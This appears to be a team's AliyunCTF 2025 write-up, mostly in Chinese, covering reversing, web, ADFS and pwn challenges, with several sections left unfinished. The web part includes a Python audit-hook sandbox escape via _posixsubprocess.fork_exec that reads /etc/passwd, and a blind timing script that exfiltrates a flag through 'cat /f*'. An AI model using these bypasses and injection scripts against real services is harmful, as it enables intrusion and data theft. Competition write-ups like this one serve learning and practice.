Writeup

AliyunCTF 2025

UKFC 2025 AliyunCTF Writeup

Reverse

Easygame

牛魔酬宾

easy-cuda-rev

跑了一遍

感觉能出 五个 gift 慢慢看

快出了,现在只差 gift1 到 2 的东西 剩下都还原了

Final 更新了一下

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239

#include <stdio.h>
#include <stdint.h>
unsigned char flag[32] = "11223344556677889900112233445566";
unsigned char T[258] = {
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 
    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 
    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 
    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 
    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 
    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 
    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, 
    0x52, 0x09
};

void decrypt(uint32_t* v, uint32_t* k) {
    uint32_t v0 = v[0], v1 = v[1];

    uint32_t delta [] = {-239350328, 387276957, 2027808484, -626627285, 1013904242, -1640531527};
    for (int j = 0;j < 10485760 ; j+=8) {
        for (int i=0 ; i < 6 ; i++) {
            delta[i] -= 239350328;
        }
    }

    int delta_t = 0;
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (int j = 0;j < 10485760 ; j+=8) {
        for (int i=0 ; i < 6 ; i++) {
            delta[i] += 239350328;
        }
        delta_t = delta[0];
        for (int i = 0; i < 8; i++) {
            if (i>=3) delta_t = delta[i-2];
            else if (i==0) delta_t = delta[0];
            else if (i==1) delta_t = delta[0] + 1640531527;
            else if (i==2) delta_t = delta[0] - 1013904242;
      
            v1 -= ((v0 << 4) + k2) ^ (v0 + delta_t) ^ ((v0 >> 5) + k3);
            v0 -= ((v1 << 4) + k0) ^ (v1 + delta_t) ^ ((v1 >> 5) + k1);
  
        }
  
    }
    v[0] = v0; v[1] = v1;
}

void encrypt(uint32_t* v, uint32_t* k) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    uint32_t delta [] = {-239350328, 387276957, 2027808484, -626627285, 1013904242, -1640531527};
    uint32_t delta_t = 0;
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (int j = 0;j < 10485760 ; j+=8) {
        // delta_t = delta[0];
        for (int i = 0; i < 8; i++) {
            if (i<5) delta_t = delta[5-i];
            else if (i==5) delta_t = delta[0] - 1013904242;
            else if (i==6) delta_t = delta[0] + 1640531527;
            else if (i==7) delta_t = delta[0];

            v0 += ((v1 << 4) + k0) ^ (v1 + delta_t) ^ ((v1 >> 5) + k1);
            v1 += ((v0 << 4) + k2) ^ (v0 + delta_t) ^ ((v0 >> 5) + k3);
        }
        for (int i=0 ; i < 6 ; i++) {
            delta[i] -= 239350328;
        }
    }
    v[0] = v0; v[1] = v1;
}

void gift2_3_4(unsigned char* mm, int length) {  
    for (unsigned  int i= 0; i < 256; i+=2)
    {
        int idx1,idx2;
        // idx1=i;
        idx2=i;
        if (i==0)
        {
            idx1=255;
        }else
        {
            idx1=i-1;
        }
  
        unsigned char left=mm[idx1];
        unsigned char right=mm[idx2];
        mm[idx2]=left;
        mm[idx1]=right;
    }
    for (unsigned int i = 0; i < 256; i+=2)
    {
        unsigned char left=mm[i];
        unsigned char right=mm[i+1];
        mm[i+1]=left;
        mm[i]=right;
        /* code */
    }
}  

int char_to_uint32(unsigned char* data, uint32_t* v) {
    for (int i = 0; i < 8; i++) {
        v[i] = (data[i*4]) | (data[i*4+1] << 8) | (data[i*4+2] << 16) | (data[i*4+3]<<24);
    }
    return 0;
}

int xor(unsigned char* data) {
    unsigned char key = 172;
    // unsigned int idx = 1;
    for (size_t idx = 0; idx < 256; idx++)
    {
        printf("%d\n", idx);
        uint8_t val = data[idx];
        for (size_t j = 0; j < 5; j++)
        {

            for (int i = 10485760-1; i >=0 ; i--)
            {
                val ^= i & 0xFF;
                val = (val >> 4) | (val << 4);
                val = T[val];
            }
        }
        val = (val >> 4) | (val << 4);
        uint16_t temp = (idx * 73u + key) & 0xFF;
        val ^= temp;
        data[idx] = val;
    }
    return 0;
}

int main(){

    // unsigned char data [] = {0x48,0xef,0x7b,0xb4,0x4e,0x3a
    //     ,0x24,0x5f,0xca,0xb0,0xd0,0xc4,0x0a,0xeb,0xf4,
    //     0xb1,0x70,0xb8,0x9a,0x1d,0x51,0x54,0x5b,0x88,0xa8,0x72,
    //     0xb0,0x2c,0x78,0xac,0x3b,0x6c,0xe4,0xb3,0xe6,0xe3,0xd9,
    //     0x38,0x6b,0x08,0xc4,0xfb,0x90,0x6a,0xf0,0x5e,0x8e,0x25,
    //     0x51,0x01,0x98,0x28,0x95,0x5a,0x5e,0x84,0x66,0x1d,0x26,
    //     0x65,0xdc,0xae,0x94,0xdb,0xf3,0x0a,0x02,0x21,0xc9,0x68,
    //     0x2d,0x7f,0x82,0x5c,0x99,0x94,0x34,0x3b,0xee,0xd1,0x79,
    //     0xb5,0xc3,0x68,0xb5,0x82,0x25,0xa0,0xf6,0xcf,0xbb,0xcd,
    //     0x5a,0x19,0xe8,0xb3,0x76,0x0f,0x41,0x64,0xbd,0x2e,0xfa,0xb9,0x00,0xdf,0x5a,0x3c,0xb1,0x02,0x69,0x08,0x40,0x0e,0x52,0xea,0x97,0x0b,0x16,0x51,0x55,0xdc,0x81,0xa4,0xdd,0x57,0xb0,0x15,0x10,0x4d,0xe1,0xd4,0x42,0x6c,0xd2,0x25,0xe1,0x70,0xa0,0x37,0xb6,0x2b,0xc8,0x45,0xd5,0x52,0x14,0x53,0x00,0x6f,0xa5,0xb4,0x56,0x7f,0x64,0xba,0x41,0x66,0x2b,0x94,0x7a,0xca,0x0d,0xcc,0x00,0xcf,0xa4,0x9d,0xb9,0x58,0xa4,0x07,0x24,0x8e,0x9d,0xff,0x12,0x6c,0x88,0x06,0xaf,0x24,0x2f,0x3d,0xca,0xf4,0xa6,0x49,0x93,0x0e,0xdb,0x65,0xec,0x5c,0x8d,0x43,0x97,0x07,0x6c,0x34,0xca,0xd1,0x26,0x66,0xcc,0x87,0x5b,0xb9,0x92,0x3d,0x1e,0xd8,0xa7,0x12,0xb6,0xd7,0xfa,0x44,0x8a,0x72,0xa0,0x82,0xc0,0x7f,0xa6,0x00,0xf9,0x23,0x61,0xa3,0x91,0xb7,0x7b,0x4e,0xc2,0x5f,0xae,0x9c,0xb6,0xe9,0x20,0xe8,0x6e,0x54,0x1b,0x35,0x09,0xbb,0x21,0x31,0x12,0xfd,0x8e,0xc1,0xc5,0x5f};
  
    unsigned int key [] ={
        -1556008596,-939442524,1013904242,338241895
    };
    // 循环读取文件每次读256字节
    FILE *fp = fopen("flag_enc", "rb");
    if (fp == NULL) {
        printf("open file error\n");
        return 0;
    }
    // 创建结果文件
    FILE *fp2 = fopen("flag_dec", "wb");
    if (fp2 == NULL) {
        printf("open file error\n");
        return 0;
    }
    unsigned char data[256];
    int cnt = 0;
    while (fread(data, 1, 256, fp) == 256) {
        unsigned int v[256/4];
        char_to_uint32(data, v);
        for (int i=0; i<256/8; i++) {
            decrypt(v + 8*i, key);
        }
        for (int i = 0; i < 8; i++) {
            data[i*4] = (v[i]) & 0xFF;
            data[i*4+1] = (v[i] >> 8) & 0xFF;
            data[i*4+2] = (v[i] >> 16) & 0xFF;
            data[i*4+3] = (v[i] >> 24) & 0xFF;
        }
        gift2_3_4(data, 256);
        xor(data);
        printf("%d: %x\n", cnt , data[0]);
        fwrite(data, 1, 256, fp2);
    }
    // unsigned int v[256/4];
    // char_to_uint32(data, v);

    // for (int i = 0; i < 8; i++) {
    //     printf("0x%x,", v[i]);
    // }

    // printf("\n");
    // decrypt(v, key);

    // for (int i = 0; i < 8; i++) {
    //     printf("0x%x,", v[i]);
    // }
        // calcul_sum();
    // // 第一次gift
    // unsigned char key = 172;
    // unsigned char* data= flag;
    // unsigned int idx = 0;
    // for (idx = 0; idx < 32; idx++)
    // {
    //     unsigned char val = data[idx];
    //     uint16_t temp = (idx * 73u + key) & 0xFF;
    //     val ^= temp;
    //     val = (val >> 4) | (val << 4);
    //     for (size_t j = 0; j < 5; j++)
    //     {
    //         for(int i = 0; i < 10485760; i++) { 
    //             val = T[val];
    //             val = (val >> 4) | (val << 4);
    //             val ^= i & 0xFF;
    //         }
    //     }
    //     data[idx] = val;
    //     printf("%x ", data[idx]);
    // }

  
    // uint8_t val = data[idx];
    // uint16_t temp = (idx * 73u + key) & 0xFF;
    // val ^= temp;
    // val = (val >> 4) | (val << 4);
    // for (size_t j = 0; j < 5; j++)
    // {
    //     for(int i = 0; i < 10485760; i++) { 
    //         val = T[val];
    //         val = (val >> 4) | (val << 4);
    //         val ^= i & 0xFF;
    //     }
    // }
    // data[idx] = val;
    // printf("%x\n", data[0]);
    //第一次5个大循环进行加密
}

Web

Ezoj 

1

sys.addaudithook是[Python 3.8](https://www.baidu.com/s?rsv_dl=re_dqa_generate&sa=re_dqa_generate&wd=Python%203.8&rsv_pq=d88fa736000df0bb&oq=sys.addaudithook&rsv_t=2b23Juo3nDF8SvbcYS4p38QE1OfZmOFx1Xqr97v3uIQbLRJ+SSVyHnOnyPM&tn=baidu&ie=utf-8)版本中引入的一个功能,用于添加审计钩子(audit hook),以监控和记录Python程序在运行时的安全敏感行为。审计钩子可以用于监控如文件读写、网络通信和动态代码执行等操作。

解法 1:把文件读取到另一个文件里面,但是不知道有没有读写权限

解法 2:打内存马,但是要绕过 addaudithook

本地调试,这个是能执行的,不出网盲注吧

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event,args):
    print(f"审计事件: {event}, 参数: {args}")
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError

sys.addaudithook(audit_checker)

try:
    import os
    import _posixsubprocess
    _posixsubprocess.fork_exec([b"123", "/etc/passwd"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1,-1, *(os.pipe()), False, False, False, None, None, None, -1, None, False)
except RuntimeError as e:
    print(f"error")

还在尝试怎么把命令塞进去

命令写好了,开始写盲注脚本了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

import requests
import string

charset = string.ascii_letters + string.digits + "{}_-"
url = "http://121.41.238.106:26721/api/submit"
flag = ""

for i in range(1, 50):
    for char in charset:
        data = {
            "problem_id":"0","code":f"import os\nimport _posixsubprocess\n\n_posixsubprocess.fork_exec([\"abc\",\"-c\",\"import os;import time;flag=os.popen('cat /f*').read();'{char}'==flag[{i-1}] and time.sleep(5)\"], [b\"/bin/python3\"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)\na, b = map(int, input().split())\nresult = a + b\nprint(result)"
        }
  
        try:
            r = requests.post(url, json=data, timeout=6)
            if r.json().get("status") == "TLE":
                flag += char
                print(f"Flag: {flag}",flush=True)
                break
        except requests.exceptions.Timeout:
            flag += char
            print(f"Timeout Found: {char} | Flag: {flag}",flush=True)
            break
  
    if flag.endswith("}"):
        break

print("Final Flag:", flag)

打卡 ok

路由后面加~可以看源码

index.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="keywords" content="HTML5 Template">
    <meta name="description" content="Forum - Responsive HTML5 Template">
    <meta name="author" content="Forum">
    <link rel="shortcut icon" href="favicon/favicon.ico">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="css/style.css">
</head>
<body>
<!-- tt-mobile menu -->

<main id="tt-pageContent" class="tt-offset-none">
    <div class="container">
        <div class="tt-loginpages-wrapper">
            <div class="tt-loginpages">
                <a href="index.html" class="tt-block-title">
                    <div class="tt-title">
                        登陆
                    </div>
              
                </a>
                <form class="form-default" method="post" action="./login.php">
                    <div class="form-group">
                        <label for="loginUserName">Username</label>
                        <input type="text" name="username" class="form-control" id="loginUserName" >
                    </div>
                    <div class="form-group">
                        <label for="loginUserPassword">Password</label>
                        <input type="password" name="password" class="form-control" id="loginUserPassword">
                    </div>
                    <div class="form-group">
                        <label for="code">code</label>
                        <input type="password" name="code" class="form-control">
                    </div>
                    <div class="form-group">
                        <button  class="btn btn-secondary btn-block">Log in</button>
                    </div>
              
                </form>
            </div>
        </div>
    </div>
</main>
<script src="js/bundle.js"></script>
</body>
</html>
<?php
$servername = "localhost";
$username = "web";
$password = "web";
$dbname = "web";
$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
session_start();
include './pass.php';
if(isset($_POST['username']) and isset($_POST['password'])){
    $username=addslashes($_POST['username']);
    $password=$_POST['password'];
    $code=$_POST['code'];
    $endpass=md5($code.$password).':'.$code;
    $sql = "select password from users where username='$username'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            if($endpass==$row['password']){
            $_SESSION['login'] = 1;
            $_SESSION['username'] = md5($username);
            echo "<script>alert(\"Welcome $username!\");window.location.href=\"./index.php\";</script>";
            }
        }
    } else {
        echo "<script>alert(\"错误\");</script>";
      die();
    }
    $conn->close();
  
}
?>

login.php,一眼注入(注不出来)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php
$servername = "localhost";
$username = "web";
$password = "web";
$dbname = "web";
$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
session_start();
include './pass.php';
if(isset($_POST['username']) and isset($_POST['password'])){
    $username=addslashes($_POST['username']);
    $password=$_POST['password'];
    $code=$_POST['code'];
    $endpass=md5($code.$password).':'.$code;
    $sql = "select password from users where username='$username'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            if($endpass==$row['password']){
            $_SESSION['login'] = 1;
            $_SESSION['username'] = md5($username);
            echo "<script>alert(\"Welcome $username!\");window.location.href=\"./index.php\";</script>";
            }
        }
    } else {
        echo "<script>alert(\"错误\");</script>";
      die();
    }
    $conn->close();
  
}
?>

pass.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

<?php
class mypass{
                public function generateRandomString($length = 10) {
                    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
                    $charactersLength = strlen($characters);
                    $randomString = '';
              
                    for ($i = 0; $i < $length; $i++) {
                        $randomString .= $characters[rand(0, $charactersLength - 1)];
                    }
              
                    return $randomString;
                }
                public function checkpass($plain) {
                        $password = $this->generateRandomString();
                        $salt = substr(md5($password), 0, 5);
                        $password = md5($salt . $plain) . ':' . $salt;
                        return $password;
                }
}
?>

/ok.php~里面有个/adminer_481.php,进去直接登,改了个前面的 guest:123456,code=123456 账号,但是这个 web 用户没写的权限

发现居然有个 root:root

Offens1ve

本地 hosts 搭起来看

2018 年的 ADFS

拓扑图也出来了,那肯定就是渗透了

ADFS 的 url 为

1

https://sts.offensive.local/adfs/ls/?wtrealm=https%3A%2F%2Foa.offensive.local%3A8443%2F&wctx=WsFedOwinState%3DJkJPfN6-8ErIqErWJTCZx1o728SAtTK0EwcVtdRGY-shzrIENZO8hT3WNV0Mu5llFp7tCoej9MG7B1Agdkcp69vX95gvW41g136UCjYhZj7lRwZzVZ2829evoSTDndgaT8eiphaNylhAWaygWhx6tw&wa=wsignin1.0

尝试 ssrf 打一波,在参数 wtrealm 来试试,测了下没有,尝试 saml token 伪造,依然没有说法

PWN

Runes

这个题主要是两个点

一个是传参只能是数字的任意 syscall 执行

第二个是有一块 mmap 的空间

任意 syscall 执行有限制条件,系统调用号和参数不得小于目前人物等级的 100 倍

第二个 mmap 由于映射了 fd,可以通过 fd 写数据从而执行 shellcode

要完成这些任务需要一定操作

若对整个题目有很熟悉的了解,会发正常情况下 syscall 只能执行一次

而且升级比较难,而且单纯通过逻辑无法控制血量满足某些要求

在第二个利用部分,如果 mmap 失败,记录 boss 血量的栈位置会直接更改成满足“开挂”部分的条件的值,从而进行多次 syscall,轻松完成题目

mmap 失败只能通过 fd(应该)的操作,最简单是 close,close 掉 fd 就需要 10 级以上

由于涉及数值输入较少,并且有阻止整形溢出的检测,有可能是对杀怪以及掉落经验进行计算,说不定有能满足 close(1023) 的机会

如果满足,就可以 close,使得 mmap 失败,同时触发预留外挂,进行无限制 syscall,重复程序开始时的 syscall 操作,mmap 映射 memfd 修改,写入 shellcode 并执行

当 atk 高于怪的 hp 时,可以不掉血

交互:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

s = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda x , y : io.sendafter(x , y)
sla = lambda x , y : io.sendlineafter(x , y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda x : io.recvline(x)
inter = lambda : io.interactive()
def cmd(idx):
    sla(b"3. Exit",str(idx))

def get_atk():
    ru(b'  ATK: ')
    atk = int(r(2))
    return atk

def get_monster_hp():
    ru(b'Monster: HP: ')
    hp = int(r(2))
    return hp
def atk_Goblin():
    atk = get_atk()
    while atk < 40 :
        cmd(1)
        monster_hp=get_monster_hp()
        print("cnt",int(monster_hp/atk))
        cnt = 0
        if(monster_hp%atk==0):
            cnt = int(monster_hp/atk)
        else :
            cnt = cnt = int(monster_hp/atk)+1
        if(monster_hp==30):
            for i in range (cnt):
                sla("4. Run\n",str(1))
                print("monster_hp",monster_hp)
        else:
            sla("4. Run\n",str(4))  

        if(get_atk()>atk):
            atk+=5
def atk_all(cho,level):
    atk = get_atk()
    while atk < 20+(level-1)*5 :
        cmd(1)
        monster_hp=get_monster_hp()
        print("cnt",int(monster_hp/atk))
        cnt = 0
        if(monster_hp%atk==0):
            cnt = int(monster_hp/atk)
        else :
            cnt = cnt = int(monster_hp/atk)+1
        if(atk >= 40):
            cho=2

        if((monster_hp==30) & (cho >=1)):
            for i in range (cnt):
                sla("4. Run\n",str(1))
                print("monster_hp",monster_hp)
        elif((monster_hp==40)& (cho >=2)):
            for i in range (cnt):
                sla("4. Run\n",str(1))
                print("monster_hp",monster_hp)
        elif((monster_hp==50)& (cho >=3)):
            for i in range (cnt):
                sla("4. Run\n",str(1))
                print("monster_hp",monster_hp)
        else:
            sla("4. Run\n",str(4))  

        if(get_atk()>atk):
            atk+=5

broken_compilter

Licensed under CC BY-NC-SA 4.0
© 2024 - 2025 UKFC
使用 Hugo 构建
主题 StackJimmy 设计